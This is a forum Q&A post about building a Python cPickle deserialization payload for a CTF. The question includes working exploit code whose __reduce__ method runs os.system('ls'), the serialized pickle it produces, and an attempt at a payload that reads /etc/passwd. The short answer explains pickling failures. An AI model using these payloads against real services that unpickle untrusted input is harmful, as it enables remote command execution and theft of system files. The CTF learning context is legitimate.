Serialization not working with cPickle

Question

Im trying to perform a cPickle deserialization for a CTF. Im working on an exploit for a deserialization vuln, trying to generate a python class that will run a command on a server when deserialized, following this example: https://lincolnloop.com/blog/playing-pickle-security/

import os
import cPickle

# Exploit that we want the target to unpickle
class Exploit(object):
    def __reduce__(self):
        return (os.system, ('ls',))

shellcode = cPickle.dumps(Exploit())
print shellcode

The thing is that the server I'm trying to exploit doesn't have the "os" or the "subprocess" modules included, so I'm not able to run shell commands. I'm trying to read local files with objects generated with the following code:

class Exploit(object):
    def __reduce__(self):
        data = open("/etc/passwd", "rb").read()
        return data

shellcode = cPickle.dumps(Exploit()) print shellcode

but when i try to run it to generate the payload, it tries to read my local /etc/passwd file and fails with the error message:

shellcode = cPickle.dumps(Exploit())
cPickle.PicklingError: Can't pickle <main.Exploit object at 0x7f14ef4b39d0>: attribute lookup main.root:x:0:0:root:/root:/b in/sh (/etc/passwd continues)

When I run the first example, it generates the following pickle succesfully (and doesnt try to do an ls on my machine):

cposix
system
p1
(S'ls'
p2
tp3
Rp4
.

So why is it not working with my code?

Answer 1

"Whenever you try to pickle an object, there will be some properties that may not serialize well. For instance, an open file handle In this cases, pickle won't know how to handle the object and will throw an error."

What's the exact usage of __reduce__ in Pickler